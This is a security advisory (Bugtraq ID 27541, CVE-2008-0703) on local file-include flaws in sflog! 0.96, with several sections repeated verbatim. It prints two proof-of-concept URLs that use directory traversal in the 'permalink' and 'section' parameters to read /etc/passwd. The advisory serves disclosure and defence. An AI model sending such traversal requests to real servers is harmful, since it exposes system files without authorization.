sflog! 'index.php' Multiple Local File Include Vulnerabilities
BID:27541
Info
sflog! 'index.php' Multiple Local File Include Vulnerabilities
| Bugtraq ID: | 27541 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-0703 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 31 2008 12:00AM |
| Updated: | May 07 2015 05:33PM |
| Credit: | muuratsalo discovered these vulnerabilities. |
| Vulnerable: |
sflog! sflog! 0.96 |
| Not Vulnerable: | |
Discussion
sflog! 'index.php' Multiple Local File Include Vulnerabilities
The 'sflog!' program is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
Exploiting these issues may allow an attacker to access potentially sensitive information in the context of the affected application.
These issues affect sflog! 0.96; other versions may also be affected.
The 'sflog!' program is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
Exploiting these issues may allow an attacker to access potentially sensitive information in the context of the affected application.
These issues affect sflog! 0.96; other versions may also be affected.
Exploit / POC
sflog! 'index.php' Multiple Local File Include Vulnerabilities
Attackers may exploit these issues through a browser.
The following proof-of-concept URIs are available:
http://www.example.com/sflog/?blog=test&permalink=../../../../../../../../../../etc/passwd
http://www.example.com/sflog/index.php?blog=test&section=../../../../../../../../../../etc/passwd
Attackers may exploit these issues through a browser.
The following proof-of-concept URIs are available:
http://www.example.com/sflog/?blog=test&permalink=../../../../../../../../../../etc/passwd
http://www.example.com/sflog/index.php?blog=test&section=../../../../../../../../../../etc/passwd
Solution / Fix
sflog! 'index.php' Multiple Local File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
sflog! 'index.php' Multiple Local File Include Vulnerabilities
References:
References:
- sflog! Project Page (sflog!)
- sflog! 0.96 remote file disclosure vulnerabilities ("muuratsalo experimental hack lab"
)